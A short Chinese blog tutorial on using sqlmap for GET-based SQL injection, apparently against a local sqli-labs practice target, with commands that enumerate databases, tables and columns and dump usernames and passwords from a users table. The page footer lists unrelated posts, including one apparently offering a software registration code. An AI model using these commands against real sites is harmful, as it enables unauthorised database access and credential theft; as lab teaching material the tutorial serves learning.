首页 技术 正文
技术 2022年11月14日
0 收藏 338 点赞 2,689 浏览 719 个字

sqlmap 使用

需要安装python2的环境

使用方法:

用最基础的get型注入开始

1、当我们发现注入点的时候,

python sqlmap.py -u “http://192.168.100.200:8004/Less-1/index.php?id=1”

2、查看所有的数据库

python sqlmap.py -u “http://192.168.100.200:8004/Less-1/index.php?id=1” –dbs

3、查看当前使用的数据库

python sqlmap.py -u “http://192.168.100.200:8004/Less-1/index.php?id=1” –current-db

4、发现使用的是security数据库,接下来对此数据库进行查询

python sqlmap.py -u “http://192.168.100.200:8004/Less-1/index.php?id=1” –tables -D “security”

5、查出所有表以后,对users表的列名进行查询

python sqlmap.py -u “http://192.168.100.200:8004/Less-1/index.php?id=1” –columns -T “users” -D “security”

6、users表中的列名已经知道了,可以直接查出所有数据

python sqlmap.py -u “http://192.168.100.200:8004/Less-1/index.php?id=1” –dump -C “id,username,password” -T “users” -D “security”

在“用户”-》“.sqlmap”-》“output”可看到查询结果

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:878 阅读:9,086
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,561
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,410
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,183
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:7,820
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:4,903